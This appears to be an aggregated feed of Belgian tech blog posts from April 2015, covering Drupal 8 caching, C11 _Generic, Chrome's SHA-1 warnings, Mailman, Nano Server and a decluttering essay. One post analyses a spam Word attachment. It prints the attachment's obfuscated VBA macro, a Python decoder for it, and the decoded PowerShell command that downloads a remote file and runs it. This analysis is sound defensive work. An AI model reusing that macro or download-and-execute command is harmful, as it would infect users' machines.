While I love photography, I never really got into video. Because I'm not the guy to pull off flips on skis or jump out of planes, I never considered myself the target audience for a GoPro. However, I got a GoPro for Christmas and was eager to try it on a ski trip to the French Alps. Below is my first attempt at shooting and editing video. The French Alps are stunning and that alone is reason to watch the video. No doubt I have to hone my skills -- both shooting and in the editing room -- and it wouldn't hurt if I could pull off a flip on my skis either. ;-)

by Dries at April 13, 2015 12:02 PM

April 12, 2015

Mattias Geniar

When The New TLD .SUCKS

The post When The New TLD .SUCKS appeared first on

I've never been a fan of the new TLDs. They won't all .SUCK, but this is just criminal.

Consider that a "Sunrise Claim" (an early registration in a new TLD by holders of registered trademarks) typically run a few hundred dollars, under .SUCKS they start at $2,499. It gets worse – if your mark happens to be one the registry has designated as a "premium" name, the Sunrise price will be even higher. (Oh, they also renew at those prices).
EasyDNS blog

Nobody wants their domain.SUCKS. The only reason to buy a .SUCKS domain is to prevent others from having it. And at $2,499 just to claim your name, with a yearly renewal at the same fee, that's just criminal.

It's like paying the mafia to keep your grocery store from being robbed. Except the internet doesn't work this way. There are plenty of alternatives to create a domain name with a negative connotation. Buying your own .SUCKS domain does nothing to help you with this.

If someone's willing to register a "", he's now got more than 1,000 alternative TLDs thanks to ICANN.

There's a reason most of the new TLDs don't catch on. They were never needed in the first place.

The post When The New TLD .SUCKS appeared first on

by Mattias Geniar at April 12, 2015 07:11 PM

Wouter Verhelst

LOADays 2015 talk done

I just uploaded my LOADays 2015 slides to slideshare. The talk seems to have been well received; I got a number of positive comments from some attendees, which is always nice.

As an aside, during the talk I did a short demo of how to sign something from within Libreoffice using my eID card. Since the slides were made in Libreoffice Impress, the easiest thing to do was just to sign the slides themselves, which worked perfectly well. So, having uploaded, downloaded, and verified these slides, I can now say with 100% certainty that slideshare does not tamper with files you upload. They may reformat them so it's easier to view on a website, but if you click on the download link, you get the original, untampered version.

At least that's the case if you sign documents, of course; it's always possible that they check for that and special-case such things. Would surprise me, though.

April 12, 2015 11:36 AM

April 10, 2015

Frank Goossens

Music from Our Tube: Sylvan Esso does the hanky panky

The studio version of Sylvan Esso‘s “Coffee” had been in my YouTube favorites playlist for a couple of months already, but it’s the first song in this NPR Tiny Desk Concert and it’s just as great! Warning: slightly quirky dancing ahead. :-)

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at April 10, 2015 04:11 AM

April 09, 2015

Wim Leers

Drupal 8 now has page caching enabled by default

After more than a year and probably hundreds of patches, yesterday it finally happened! As of 13:11:56 CET, April 8, 2015, Drupal 8 officially has page caching enabled by default!1 And not the same page caching as in Drupal 7: this page cache is instantly updated when something is changed.

The hundreds of patches can be summarized very simply: cache tags, cache tags, cache tags. Slightly less simple: cacheability metadata is of vital importance in Drupal 8. Without it, we’d have to do the same as in Drupal 7: whenever content is created or a comment is posted, clear the entire page cache. Yes, that is as bad as it sounds! But without that metadata, it simply isn’t possible to do better.2

I’ve been working on this near-full time since the end of 2013 thanks to Acquia, but obviously I didn’t do this alone — so enormous thanks to all of you who helped!

This is arguably the biggest step yet to make Drupal Fast By Default. I hate slow sites with a passion, so you can probably see why I personally see this as a big victory :)

(One could argue you could just enable Drupal 7’s page cache, but there are 3 reasons why this is inferior to Drupal 8’s page cache: a) no instantaneous updates; b) any node or comment posted causes the entire page cache to be cleared (!), c) it’s not enabled by default: many users don’t know they should enable this. Sure, you can get similar performance, but you’ll have to give up certain things, which makes it an apples vs. oranges comparison.)


By default, Drupal 8 is now between 2 and 200 times faster than Drupal 7 for anonymous users: Drupal 8 will respond in constant time, while for Drupal 7 it depends on the complexity of the page.

On my machine (ab -c1 -n 1000, PHP 5.5.11, Intel Core i7 2.8 GHz, warm caches):

Drupal 7: response time depends on the complexity of the page.

Drupal 8: always 6.5 ms/request (154 requests/s)3.


The real beauty is that it's a win-win: enterprise (Acquia), medium, small and tiny (hobbyist) sites all win.

So my work was sponsored by Acquia, but it benefits everyone!

People have been expressing concerns that Drupal 8 has become too complex, that it doesn’t care about site builders anymore, that it is only for enterprises, etc. I think this is a good counterexample.
Yes, we added the complexity of cacheability metadata, but that only affects developers — for whom we have good documentation. And most importantly: site builders reap the benefits: they don’t even have to think about this anymore. Manually clearing caches is a thing of the past starting with Drupal 8!

Page cache is just a built-in reverse proxy

Drupal’s page cache is just a built-in reverse proxy. It’s basically “poormansvarnish”.

Drupal 8 bubbles all cacheability metadata up along the render tree, just like JavaScript events bubble up along the DOM tree. When it reaches the tree’s root, it also bubbles up to the response level, in the form of the X-Drupal-Cache-Tags header.

The page cache uses that header to know what cache tags it should be invalidated by. And because of that, other (“real”) reverse proxies can do exactly the same. The company behind Varnish even blogged about it. And CDNs are even starting to support this exact technique out of the box, for example Fastly.
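
Drupal's actual implementation lives in its Cache API, but the core idea is small enough to sketch. Below is a toy model (plain Python, with invented names for illustration, not Drupal's API) of what tag-based invalidation buys you: each cached page remembers the tags of the content it was rendered from, and invalidating one tag drops exactly the affected pages instead of the whole cache.

```python
class TaggedCache:
    """Minimal page cache where every entry carries cache tags."""

    def __init__(self):
        self._entries = {}  # url -> (body, set of tags)

    def set(self, url, body, tags):
        self._entries[url] = (body, set(tags))

    def get(self, url):
        entry = self._entries.get(url)
        return entry[0] if entry else None

    def invalidate_tags(self, tags):
        """Drop only the entries rendered from any of the given tags."""
        tags = set(tags)
        stale = [url for url, (_, t) in self._entries.items() if t & tags]
        for url in stale:
            del self._entries[url]


cache = TaggedCache()
cache.set("/node/5", "<html>article 5</html>", ["node:5", "user:3"])
cache.set("/frontpage", "<html>teasers</html>", ["node:5", "node:6", "node_list"])
cache.set("/about", "<html>about us</html>", ["node:7"])

# Editing node 5 invalidates only the pages that rendered it:
cache.invalidate_tags(["node:5"])
assert cache.get("/node/5") is None     # gone
assert cache.get("/frontpage") is None  # gone: it showed a teaser of node 5
assert cache.get("/about") == "<html>about us</html>"  # untouched
```

A reverse proxy honouring X-Drupal-Cache-Tags does essentially the same bookkeeping, just keyed on the response header instead of an in-process dict.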

Last but not least: all of Drupal 8’s integration tests use the page cache by default, which means all of our integration tests effectively verify that Drupal works correctly even if they’re behind a reverse proxy!

New possibilities for small sites (and shared hosting)

On one end of the spectrum, I see great shared hosting providers starting to offer Varnish even on their smallest plans. For example: Gandi offers Varnish on their €4/month plans. If users can configure Varnish — or even better, if they pre-configure Varnish to support Drupal 8’s cache tag-based invalidation — then almost all traffic will be handled by Varnish.

For 90% or more of all sites, this would quite simply be good enough: very cheap, very fast, very flexible.4

I can’t wait until we see the first hosting provider offering such awesome integration out of the box!

New possibilities for enterprise sites (and enterprise hosting)

On the other end of the spectrum, enterprise hosting now gains the ability to invalidate (purge) all, and only, the affected pages on a CDN5. Without having to generate a list of URLs that a modified piece of content may appear on, and then purge those URLs. Without having to write lots of hooks to catch all the cases where said content is being modified.

At least equally important: it finally allows for caching content that previously was generated dynamically for every request, because it was a strong requirement that the information always be up-to-date6. With cache tag support, and strong guarantees that cache tags indeed are invalidated when necessary, such use cases now can cache the content and still be confident that updates will immediately propagate.

New possibilities for developers

Finally, the addition of cache tags and by extension, all render cacheability metadata (cache tags, contexts and max-age), allow for greater insight and tooling when analyzing hosting, infrastructure, performance and caching problems. Previously, you had to analyze/debug a lot of code to figure out why something that was cached was not being invalidated when appropriate by said code.

Because it’s now all standardized, we can build better tools — we can even automatically detect likely problems: suspiciously frequent cache tag invalidations, suspiciously many cache tags … (but also cache contexts that cause too many variations, too low or too high maximum ages …).

Next steps

Warm cache performance is now excellent, but only for anonymous users.

Next week, at Drupal Dev Days Montpellier, we’ll be working on improving Drupal 8’s cold cache performance (including bootstrap and routing performance). That will also help improve performance for authenticated users.

But we already have been working several weeks on improving performance for authenticated users. Together with the above, we should be able to outperform Drupal 7. This is the plan that Fabian Franz and I have been working towards:

  1. smartly caching partial pages for all users (including authenticated users): d.o/node/2429617, which requires cache contexts to be correct
  2. sending the dynamic, uncacheable parts of the page via a BigPipe-like mechanism: d.o/node/2429287

  1. That’s commit 25c41d0a6d7806b403a4c0c555f7dadea2d349f2

  2. In other words: all of this is made possible thanks to optimal cache invalidation. Yes, that quote

  3. We made the page cache faster. We went down from 8.3 ms/request (120 requests/second) when this blog post was published on April 9, to 6.5 ms/request (154 requests/second) on April 17. It should be possible to achieve 5 ms/request, or 200 requests per second. Drupal 7 is still significantly faster though, at 2.5 ms/request (on my machine, see the Benchmark section). It’s likely Drupal 8 won’t be able to match that because the early bootstrapping is heavier. 

  4. And not something any other CMS offers as far as I know — if there is one, please leave a comment! 

  5. Keep an eye on the Purge module for Drupal 8. It will make it very easy to apply cache tag-based invalidation to self-hosted reverse proxies (Varnish, nginx…), but also to put your entire site behind a CDN and still enjoy instantaneous invalidations! 

  6. You could already use #cache[expire] in Drupal 7, but in Drupal 8, the combination of #cache[max-age] and #cache[tags] means that you have both time-based invalidation and instantaneous tag-based invalidation. Whichever invalidation happens first, invalidates the cached data. And therefore: updates occur as expected. 
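
That "whichever invalidation happens first" rule from footnote 6 can be illustrated with a small sketch (toy Python, not Drupal's #cache API): an entry dies either when its max-age elapses or when one of its tags is invalidated, whichever comes first.

```python
import time

class CacheEntry:
    """A cached value with both time-based (max-age) and tag-based invalidation."""

    def __init__(self, value, tags, max_age):
        self.value = value
        self.tags = set(tags)
        self.expires_at = time.monotonic() + max_age
        self.tag_invalidated = False

    def get(self):
        # Invalid if either mechanism fired; whichever happened first wins.
        if self.tag_invalidated or time.monotonic() >= self.expires_at:
            return None
        return self.value

def invalidate_tag(entries, tag):
    for entry in entries:
        if tag in entry.tags:
            entry.tag_invalidated = True

entry = CacheEntry("cached body", tags=["node:5"], max_age=3600)
assert entry.get() == "cached body"  # fresh: within max-age, tags intact
invalidate_tag([entry], "node:5")    # tag invalidation beats the 1-hour expiry
assert entry.get() is None
```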

by Wim Leers at April 09, 2015 02:25 PM

Frank Goossens

ALA about Angular's shortcoming: it's the server, stupid!

In “Let links be links” at A List Apart, Ross Penman discusses some of the dangers of building single-page apps that rely entirely on client-side JavaScript (using e.g. AngularJS or Ember) and, more importantly, proposes a solution:

When dynamic web page content is rendered by a server, rendering code only has to be able to run on that one server. When it’s rendered on a client, the code now has to work with every client that could possibly visit the website. […] If framework developers could put in the effort (which, admittedly, seems large) to get apps running in Node just as they run in the browser, initial page rendering could be handled by the server, with all subsequent activity handled by the browser. […] If this effort could be made at the outset by a framework maintainer, then every developer using that framework could immediately transform an app that only worked on the latest web browsers into a progressively enhanced experience compatible with virtually any web client—past, present, or future. […]

by frank at April 09, 2015 11:05 AM

April 08, 2015

Mattias Geniar

When Mailing Lists Turn Into Online Forums

The post When Mailing Lists Turn Into Online Forums appeared first on

Mailman 3.0 will introduce a powerful feature that can turn mailing lists into online bulletin boards.

If you're into Open Source, chances are you've googled a problem and found a solution on an obscure website, filled with pre-formatted text that looks like it came from the '80s. Congratulations, you were helped by a mailing list archive.

The software responsible for running most of these mailing lists, Mailman, has a big update ready.

HyperKitty is a Django-based archiver application that replaces Pipermail. It provides a modern web interface to browse and search archived messages and threads.

Interestingly, it also allows users to post to discussions, so that by default users can interact with any Mailman mailing list as though it were a web forum, if they prefer.

The online demo looks impressive.


But I'm not convinced this is a move for the better.

I've often found a mailing list post after some Google searches, wanted to reply, and then spent several minutes searching for the mailing list subscription and the right thread, ... Honestly, mailing lists are a bit of a mess.

But at the same time, they're not a forum. Not in the sense that we know them today. There are no (well: very few) trolls on mailing lists. Those who take the effort of signing up to a mailing list aren't doing it to curse at others or to be violent. They do so to stay informed, to interact and to help people.

I fear that turning our beloved mailing lists into online forums would mean the death of "mailing list quality posts" as we know it.

The post When Mailing Lists Turn Into Online Forums appeared first on

by Mattias Geniar at April 08, 2015 10:15 PM

Microsoft’s Nano Server & Hyper-V Containers

The post Microsoft’s Nano Server & Hyper-V Containers appeared first on

Holy cow, they're on a roll.

After embracing Open Source, they're taking the Windows Server OS to a whole new level. The kind of level I, as a Linux enthusiast, am glad to see.

Nano Server

[...] we removed the GUI stack, 32 bit support (WOW64), MSI and a number of default Server Core components. There is no local logon or Remote Desktop support. All management is performed remotely via WMI and PowerShell.

In addition to Server Core editions, Microsoft is announcing Nano Server, an even more trimmed-down version of the OS with only the tools needed to run your applications.

It's starting to look more like a Linux kernel: a new version of Windows Server, without the bloat and lagginess that come with the GUI management tools.

We are improving remote manageability via PowerShell with Desired State Configuration as well as remote file transfer, remote script authoring and remote debugging.

To manage Nano Servers, they're investing more in Desired State Configuration, a Windows configuration management solution similar to Puppet or Chef. DevOps all around.

Seriously, nice move.

Hyper-V Containers

The newly announced Nano Server is to Hyper-V Containers what CoreOS is to Docker. An OS as tiny as possible, built with one purpose: run containers.

Leveraging our deep virtualization experience, Microsoft will now offer containers with a new level of isolation previously reserved only for fully dedicated physical or virtual machines, while maintaining an agile and efficient experience with full Docker cross-platform integration. Through this new first-of-its-kind offering, Hyper-V Containers will ensure code running in one container remains isolated and cannot impact the host operating system or other containers running on the same host.

Looks like we've got Docker containers on steroids, rebranded to Hyper-V containers.

The New Microsoft

It bears repeating: the Microsoft of the last year is one like we've never seen before. They're embracing Open Source, investing in the DevOps culture of automation via tools like Chocolatey, Desired State Configuration, Containers, ...

I've lost interest in the Microsoft stack in the last few years, but announcements like these force me to give Windows Server a new chance.

The post Microsoft’s Nano Server & Hyper-V Containers appeared first on

by Mattias Geniar at April 08, 2015 09:12 PM

Lionel Dricot

Freedom is the trash can!


How software development taught me to curb my urge to consume by throwing things in the trash.

It's late, you've worked all day, you're hungry. You open the fridge: it contains various containers and a dozen assorted products. No, decidedly, nothing. You resign yourself to ordering a pizza.

It's an important day. You want to make a good impression. You open your wardrobe. It's overflowing. Two t-shirts fall out. You close it again: no, decidedly, you have nothing left to wear. A trip to the store is becoming urgent. And the sales happen to be on…

What do these two situations have in common? The paradox of choice!

Well known to software designers, the paradox of choice states that offering choices to the user makes for a bad experience. Whenever we face a decision, we unconsciously believe that a best choice exists. We don't see a choice as an option but as a test challenging us to find the best solution, with the underlying fear of not picking the right one.

The stress induced by choice is particularly obvious among computing beginners: confronted with a dialog box, they panic to the point of being unable to read rationally. In desperation, they close the dialog box using the cross, to avoid making a choice.

This stress of choice is omnipresent in our consumer society. Thousands of products, thousands of brands celebrating "freedom of choice". Yet, as said above, this freedom is illusory and is, on the contrary, constraining.

Faced with so many choices, we prefer to let ourselves be guided, a role advertising fills perfectly. More subtly, having too many choices within our own home discourages us, a discouragement we interpret as a lack. Which pushes us to fill our home even more. Which increases our discouragement and our dissatisfaction.

The more we buy, the more we own, the more we feel a lack and the need to buy!

Having realized this, whenever I feel I am short of clothes, whenever I feel the need to buy something new, I sort through my existing clothes and throw away or give away a large part of them (sometimes up to half). The effect is striking: I genuinely feel like I have a brand-new wardrobe. Reducing my choices gives me the paradoxical impression of now having more choice.

Without us consulting each other, my partner did the same with the kitchen cupboards: throwing out what was expired and inedible, giving away what we would probably never eat, cooking what was past its date but still edible. The result was just as clear-cut: we feel far less need to order in or eat out. The fridge, which has never been so empty, always contains the makings of a meal.

Throwing away means regaining your freedom, your choices! Throwing away is a real satisfaction and brings a genuine feeling of liberation.

In an amusing return to my roots, I realized that this conclusion also applies to… software development! I recently saw the example of a client who kept asking for new features and then, after several months, complained that the interface was too complex.

It's easy to blame the client, to say he doesn't know what he wants. But deep down, as users we stand before a piece of software as we stand before a fridge or a wardrobe: if we feel the need to add a feature, it's because the software already has too many. It's time to throw features away, to simplify it.

In the end, saving money or regaining your freedom is quite simple: throw things away when you feel like consuming, simplify when you feel the need to make things complex.

Throw away to consume less!


Photo by Jes. You might also be interested in gathering material goods.

Thank you for taking the time to read this pay-what-you-want post. Take the liberty of supporting me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.

Flattr this!

by Lionel Dricot at April 08, 2015 05:19 PM

Mattias Geniar


The post Momentum appeared first on

Take joy in the little things of life, like the Momentum plugin in Chrome.

A personal greeting on a random high-res background for every tab you open in Chrome. Sounds like a performance drag, but it isn't.


Disable the default Focus, Quick Links, Todo, Weather, ... settings in the bottom left and just enjoy the peace and quiet of the image.


I love it.

The post Momentum appeared first on

by Mattias Geniar at April 08, 2015 12:45 PM

April 07, 2015

Wouter Verhelst

C11 function overloading

About four years ago, the ISO 9899:2011 "C11" standard was announced. At the time, I had a short look at (a draft version of) the standards document, and found a few interesting bits in there. Of course, however, due to it only very recently having been released, I did not have much hope of it being implemented to any reasonable amount anywhere yet. Which turned out to be the case. Even if that wasn't true, writing code that uses C11 features and expecting it to work just about anywhere else would have been a bad idea back then.

We're several years down the line now, however, and now the standard has been implemented to a reasonable extent in most compilers. GCC claims its "support [for C11] is at a similar level of completeness to (...) C99 support" since GCC 4.9.

Since my laptop has GCC 4.9, I looked at one feature in C11 that I have been wanting to use for a while: Generic selection.

#include <stdint.h>
#include <inttypes.h>
#include <stdio.h>

void say32(uint32_t i) {
    printf("32-bit variable: %" PRId32 "\n", i);
}

void say64(uint64_t i) {
    printf("64-bit variable: %" PRId64 "\n", i);
}

void sayother(int i) {
    printf("This is something else.\n");
}

#define say(X) _Generic((X), uint32_t: say32, uint64_t: say64, default: sayother)(X)

int main(void) {
    uint32_t v32 = 32;
    uint64_t v64 = 64;
    uint8_t v8 = 8;

    say(v32);
    say(v64);
    say(v8);
}

Output of the above:

32-bit variable: 32
64-bit variable: 64
This is something else.

or, "precompiler-assisted function overloading for C". Should be useful for things like:

#define ntoh(X) _Generic((X), int16_t: ntohs, uint16_t: ntohs, int32_t: ntohl, uint32_t: ntohl)(X)
#define hton(X) _Generic((X), int16_t: htons, uint16_t: htons, int32_t: htonl, uint32_t: htonl)(X)

... and if one adds the ntohll found here, it can do 64 bit as well.
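
As an aside, the same dispatch-on-argument-type idea exists elsewhere; for comparison (my illustration, not part of the original post), Python offers a runtime, rather than compile-time, equivalent in functools.singledispatch:

```python
from functools import singledispatch

@singledispatch
def say(x):
    # Default implementation, used when no registered type matches.
    return "This is something else."

@say.register
def _(x: int):
    # Picked when the first argument is an int.
    return "int variable: %d" % x

@say.register
def _(x: float):
    # Picked when the first argument is a float.
    return "float variable: %g" % x

print(say(32))       # dispatched on int
print(say(6.4))      # dispatched on float
print(say("hello"))  # falls back to the default implementation
```

Unlike _Generic, which the compiler resolves at no runtime cost, singledispatch chooses the implementation when the call happens.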

April 07, 2015 10:12 PM


Xavier Mertens

Malicious MS Word Document not Detected by AV Software

[This blogpost has also been published as a guest diary on]

Like everybody, I’m receiving a lot of spam every day but… I like it! All unsolicited messages are stored in a dedicated folder for two purposes:

This helps me to find new types of spam or new techniques used by attackers to deliver malicious content to our mailboxes. Today, I received an interesting Word document. I’m not sure if it is a very common one, but I did a small analysis. The mail was based on a classic fake invoice notification:

From: Ollie Oconnor <>
To: xavier <xxx>
Subject: 49933-Your Latest Documents from RS Components 570009054

The fake invoice was related to, a UK online shop for electronic devices, components and IT-related stuff. The attached Word document was processed by my MIME2VT tool, but the VirusTotal score was 0/53! Interesting… It was too tempting not to make some manual investigations. Using Didier Stevens’s tool oledump, I extracted the following macro:

$ ./ /tmp/20150331-A7740189461014146728299-1.doc
 1:      113 '\x01CompObj'
 2:     4096 '\x05DocumentSummaryInformation'
 3:     4096 '\x05SummaryInformation'
 4:     4096 '1Table'
 5:     4096 'Data'
 6:      490 'Macros/PROJECT'
 7:       65 'Macros/PROJECTwm'
 8: M  11613 'Macros/VBA/Module1'
 9: M   1214 'Macros/VBA/ThisDocument'
10:     2932 'Macros/VBA/_VBA_PROJECT'
11:     1165 'Macros/VBA/__SRP_0'
12:       70 'Macros/VBA/__SRP_1'
13:     8430 'Macros/VBA/__SRP_2'
14:      103 'Macros/VBA/__SRP_3'
15:      561 'Macros/VBA/dir'
16:     5684 'WordDocument'
$ ./ -s 8 -v /tmp/20150331-A7740189461014146728299-1.doc
Attribute VB_Name = "Module1"
Sub sdfsdfdsf()
GVhkjbjv = chrw(49.5 + 49.5) & chrw(54.5 + 54.5) & chrw(50 + 50) & chrw(16 + 16) & chrw(23.5 + 23.5) & chrw(37.5 + 37.5) & chrw(16 + 16) & chrw(56 + 56) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(50.5 + 50.5) & chrw(57 + 57) & chrw(57.5 + 57.5) & chrw(52 + 52) & chrw(50.5 + 50.5) & chrw(54 + 54) & chrw(54 + 54) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(22.5 + 22.5) & chrw(34.5 + 34.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58.5 + 58.5) & chrw(58 + 58) & chrw(52.5 + 52.5) & chrw(55.5 + 55.5) & chrw(55 + 55) & chrw(40 + 40) & chrw(55.5 + 55.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(49.5 + 49.5) & chrw(60.5 + 60.5) & chrw(16 + 16) & chrw(49 + 49) & chrw(60.5 + 60.5) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(57.5 + 57.5) & chrw(57.5 + 57.5) & chrw(16 + 16)
GYUUYIiii = chrw(22.5 + 22.5) & chrw(55 + 55) & chrw(55.5 + 55.5) & chrw(56 + 56) & chrw(57 + 57) & chrw(55.5 + 55.5) & chrw(51 + 51) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(20 + 20) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(59.5 + 59.5) & chrw(22.5 + 22.5) & chrw(39.5 + 39.5) & chrw(49 + 49) & chrw(53 + 53) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58 + 58) & chrw(16 + 16) & chrw(41.5 + 41.5) & chrw(60.5 + 60.5) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(50.5 + 50.5) & chrw(54.5 + 54.5) & chrw(23 + 23) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(58 + 58) & chrw(23 + 23) & chrw(43.5 + 43.5) & chrw(50.5 + 50.5) & chrw(49 + 49) & chrw(33.5 + 33.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(50.5 + 50.5) & chrw(55 + 55) & chrw(58 + 58) & chrw(20.5 + 20.5) & chrw(23 + 23)
hgFYyhhshu = chrw(34 + 34) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(55 + 55) & chrw(54 + 54) & chrw(55.5 + 55.5) & chrw(48.5 + 48.5) & chrw(50 + 50) & chrw(35 + 35) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(20 + 20) & chrw(19.5 + 19.5) & chrw(52 + 52) & chrw(58 + 58) & chrw(58 + 58) & chrw(56 + 56) & chrw(29 + 29) & chrw(23.5 + 23.5) & chrw(23.5 + 23.5) & chrw(24.5 + 24.5) & chrw(28 + 28) & chrw(26.5 + 26.5) & chrw(23 + 23) & chrw(25.5 + 25.5) & chrw(28.5 + 28.5) & chrw(23 + 23) & chrw(24.5 + 24.5) & chrw(26 + 26) & chrw(28.5 + 28.5) & chrw(23 + 23) & chrw(25 + 25) & chrw(24.5 + 24.5) & chrw(23.5 + 23.5) & chrw(53 + 53) & chrw(57.5 + 57.5) & chrw(48.5 + 48.5) & chrw(60 + 60) & chrw(55.5 + 55.5) & chrw(28 + 28) & chrw(58.5 + 58.5) & chrw(23.5 + 23.5) & chrw(51.5 + 51.5) & chrw(25.5 + 25.5) & chrw(28.5 + 28.5) & chrw(49 + 49) & chrw(25 + 25) & chrw(49.5 + 49.5) & chrw(60 + 60) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(19.5 + 19.5)
GYiuudsuds = chrw(22 + 22) & chrw(19.5 + 19.5) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(19.5 + 19.5) & chrw(20.5 + 20.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(55 + 55) & chrw(50 + 50) & chrw(16 + 16)
shdfihiof = chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23)
doifhsoip = chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(48.5 + 48.5) & chrw(57 + 57) & chrw(58 + 58) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5)
JHGUgisdc = GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip
IUGuyguisdf = Shell(JHGUgisdc, 0)
End Sub

The macro is quite simple: a shell command is obfuscated by multiple chrw() calls that generate substrings, which are concatenated and passed to the Shell() function to be executed. Let’s write a small Python script to decode this. It searches for all occurrences of chrw(), extracts the values and builds the decoded string:

import re
import sys

data = sys.stdin.read()
r = re.compile(r'chrw\((\S+) \+ (\S+)\)')
i = re.findall(r, data)
cmd = ""
for match in i:
    cmd = cmd + chr(int(float(match[0]) + float(match[1])))
print cmd

Here is the result:

# ./ -s 8 -v /tmp/20150331-A7740189461014146728299-1.doc | ./
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\4543543.exe; start %TEMP%\4543543.exe;

The web server serving the malware (an IP address located in Russia) is down at the moment… I’m keeping an eye on it…

by Xavier at April 07, 2015 06:27 PM

Mattias Geniar

Chrome Version 42 Starts Marking SHA-1 SSL Certificates As Insecure

The post Chrome Version 42 Starts Marking SHA-1 SSL Certificates As Insecure appeared first on

As announced in September 2014, Chrome version 42 will start to mark SSL connections using the SHA-1 algorithm as insecure, with a big red cross in the browser.

Update #1: this article originally mentioned Chrome blocking SHA-1 certificates. Chrome will mark them as insecure, but won't actively block the connection. More in the post below.

Update #2: Chrome 42 is now the default and is auto-updated on all clients. SHA-1 certificates are now marked as insecure. (Chrome Release Blog: the Stable channel has been updated to 42.0.2311.87)

Chrome v42 is now publicly released. The browser now starts marking SSL certificates that still use the SHA-1 algorithm as insecure with a big red cross.

What is valid on Chrome 41 isn't on Chrome 42. The site is a prime example. Here's the site on Chrome 41.


That same site is showing SSL certificate errors on Chrome 42.


If you haven't already, check your certificates. If they're still using the SHA-1 algorithm, ask your SSL provider for a re-issue (hopefully free of charge) using SHA-256. There are some additional rules on when SHA-1 certs are shown as insecure, and when they aren't, depending on the expiration date.

The tl;dr: only SHA-1 certificates with an expiration date after 2015 are reported as insecure.

The problem is, it's not only your certificate that needs to stop using SHA-1: every intermediate needs to be updated as well. In the case of XKCD's site, the certificate itself was correctly using SHA-256, but the intermediate wasn't.



Better check your certificate chains!

As I've said before, the chain of trust is only as strong as its weakest link.

The post Chrome Version 42 Starts Marking SHA-1 SSL Certificates As Insecure appeared first on

by Mattias Geniar at April 07, 2015 11:04 AM

Wim Leers

renderviz: tool visualizing Drupal 8's render tree

I’m working on making Drupal 8 faster as part of my job at Acquia. The focus has been on render caching [1] [2], which implies that cacheability metadata is of vital importance in Drupal 8.

To be able to render cache all things that can possibly be render cached, Drupal 8 code must:

Before Drupal 8, approximately zero attention was given to cacheability of the rendered content: everything seen on a Drupal 7 page is rendered dynamically, with only the occasional exception.

By flipping that around, we make developers more conscious about the output they’re generating, and how much time it takes to generate that output. This in turn allows Drupal 8 to automatically apply powerful performance optimizations, such as:

  1. enabling Drupal’s internal page cache (for anonymous users) by default: d.o/node/606840, which requires cache tags to be correct
  2. smartly caching partial pages for all users (including authenticated users): d.o/node/2429617, which requires cache contexts to be correct
  3. sending the dynamic, uncacheable parts of the page via a BigPipe-like mechanism: d.o/node/2429287

(The first of those three will likely happen this week. We’re working hard to make the last two a reality.)


